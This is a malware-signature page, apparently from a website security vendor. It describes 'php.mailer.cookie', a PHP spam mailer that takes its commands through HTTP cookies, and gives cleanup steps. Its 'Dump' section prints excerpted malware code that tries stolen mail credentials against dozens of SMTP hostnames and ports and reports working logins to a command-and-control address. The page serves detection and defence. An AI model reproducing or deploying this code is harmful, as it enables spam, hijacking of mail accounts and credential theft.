Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.mailer.cookie

php.mailer.cookie

PHP mailers are, as the name suggests, tools intended to send e-mails using php commands. CMSs like WordPress, Joomla or Magento have builtin functions to send e-mails. However, malware creators have their own specially crafted scripts to send messages. Such scripts can be used for sending spam, phishing e-mails, flooding mailboxes or stealing and sending sensitive data back to the malware creators.
PHP mailers are often part of various spam bots and other malware types, or are used for sending sensitive data back to attackers.
Usually such script receive commands and data via POST parameters. However some of them try to obfuscate everything they do and may use HTTP cookies instead.

Affecting

Any vulnerable PHP based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your site's files looking for mail() functions, email headers such as "X-Priority:" or "nMessage-ID:", or socket functions in files that you don't recognize.
Check your site's access_logs for any sign of suspicious POST request, this may point out which files are being used for sending the unwanted messages.
Also you can sign up with us and let our team remove the malware for you.

Dump


...
error_reporting(0);
$host = urldecode($_COOKIE['ho']);
$port = $_COOKIE['po'];
$socks_host = $_COOKIE['sh'];
$socks_port = $_COOKIE['sp'];
$mail = urldecode($_COOKIE['ma']);
$login = urldecode($_COOKIE['lo']);
$pass = urldecode($_COOKIE['pa']);
$mailto = urldecode($_COOKIE['mt']);
$fname = urldecode($_COOKIE['fn']);
$organ = urldecode($_COOKIE['or']);
$ehlo = urldecode($_COOKIE['eh']);
$subj = urldecode($_COOKIE['su']);
$sub = $subj;
$body = stripslashes(urldecode($_COOKIE['bo']));
$sds = urldecode($_COOKIE['sd']);
$tout = $_COOKIE['rt'];
$socks_user = urldecode($_COOKIE['sl']);
$socks_pass = urldecode($_COOKIE['sc']);
$rel = $mail . ':' . $pass;

if (!$_COOKIE['a']) {
if ($socks_host) {
$socks = $socks_host . ':' . $socks_port;
}

$body = str_replace("{br}", "n", $body);
$ex = explode("@", $mail);

...

if ($try == 'BAUTH') {
$try = mch($smtp, $lport, $fm, $pass);
}

mch('smtp.' . $host, 25, $em, $pass);
mch('smtp.' . $host, 25, $fm, $pass);
mch('mail.' . $host, 25, $em, $pass);
mch('mail.' . $host, 25, $fm, $pass);
mch('mx.' . $host, 25, $em, $pass);
mch('mx.' . $host, 25, $fm, $pass);
mch($host, 25, $em, $pass);
mch('relay.' . $host, 25, $em, $pass);
mch('email.' . $host, 25, $em, $pass);
mch('pop.' . $host, 25, $em, $pass);
mch('pop3.' . $host, 25, $em, $pass);
mch('imap.' . $host, 25, $em, $pass);
mch('freemail.' . $host, 25, $em, $pass);
mch('box.' . $host, 25, $em, $pass);
mch('smtp.mail.' . $host, 25, $em, $pass);
mch($host, 25, $fm, $pass);
mch('relay.' . $host, 25, $fm, $pass);
mch('email.' . $host, 25, $fm, $pass);
mch('pop.' . $host, 25, $fm, $pass);
mch('pop3.' . $host, 25, $fm, $pass);
mch('imap.' . $host, 25, $fm, $pass);
mch('freemail.' . $host, 25, $fm, $pass);
mch('box.' . $host, 25, $fm, $pass);
mch('smtp.mail.' . $host, 25, $fm, $pass);
mch('ssl://smtp.' . $host, 465, $em, $pass);
mch('ssl://mail.' . $host, 465, $em, $pass);
mch('ssl://smtp.' . $host, 465, $fm, $pass);
mch('ssl://mail.' . $host, 465, $fm, $pass);
mch('ssl://mx.' . $host, 465, $em, $pass);
mch('ssl://mx.' . $host, 465, $fm, $pass);
mch('ssl://' . $host, 465, $em, $pass);
mch('ssl://relay.' . $host, 465, $em, $pass);
mch('ssl://email.' . $host, 465, $em, $pass);
mch('ssl://pop.' . $host, 465, $em, $pass);
mch('ssl://pop3.' . $host, 465, $em, $pass);
mch('ssl://imap.' . $host, 465, $em, $pass);
mch('ssl://freemail.' . $host, 465, $em, $pass);
mch('ssl://box.' . $host, 465, $em, $pass);
mch('ssl://smtp.mail.' . $host, 465, $em, $pass);
mch('ssl://' . $host, 465, $fm, $pass);
mch('ssl://relay.' . $host, 465, $fm, $pass);
mch('ssl://email.' . $host, 465, $fm, $pass);
mch('ssl://pop.' . $host, 465, $fm, $pass);
mch('ssl://pop3.' . $host, 465, $fm, $pass);
mch('ssl://imap.' . $host, 465, $fm, $pass);
mch('ssl://freemail.' . $host, 465, $fm, $pass);
mch('ssl://box.' . $host, 465, $fm, $pass);
mch('ssl://smtp.mail.' . $host, 465, $fm, $pass);
post_mch($sds, 'C2', $rel);
}

...